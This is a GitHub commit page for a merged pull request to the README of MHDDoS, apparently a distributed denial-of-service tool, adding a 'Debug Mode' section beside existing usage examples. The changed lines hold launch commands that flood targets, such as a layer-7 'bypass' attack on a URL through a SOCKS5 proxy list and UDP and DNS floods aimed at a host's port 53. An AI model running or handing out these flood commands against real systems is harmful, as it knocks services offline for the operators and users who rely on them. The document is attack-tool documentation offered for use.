Merge pull request #154 from SudoLite/patch-3

Update debug mode example
This commit is contained in:
MH_ProDev 2022-03-01 23:55:35 +03:30 committed by GitHub
commit 1da577972d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -110,9 +110,8 @@ cd MHDDoS
pip3 install -r requirements.txt
```
---
**Launch Script**
## Launch Script
| Proxy Type | Value |
| ----------------- | -------- |
@ -132,6 +131,12 @@ python3 start.py udp 1.1.1.1:53 1 100
python3 start.py dns 1.1.1.1:53 1 100 dns.txt
```
* Debug Mode (L4/L7):
```console
python3 start.py bypass https://example.com 5 1000 socks5.txt 100 100 true
python3 start.py udp 1.1.1.1:53 1 100 true
```
* Tools/Help:
```console
python3 start.py tools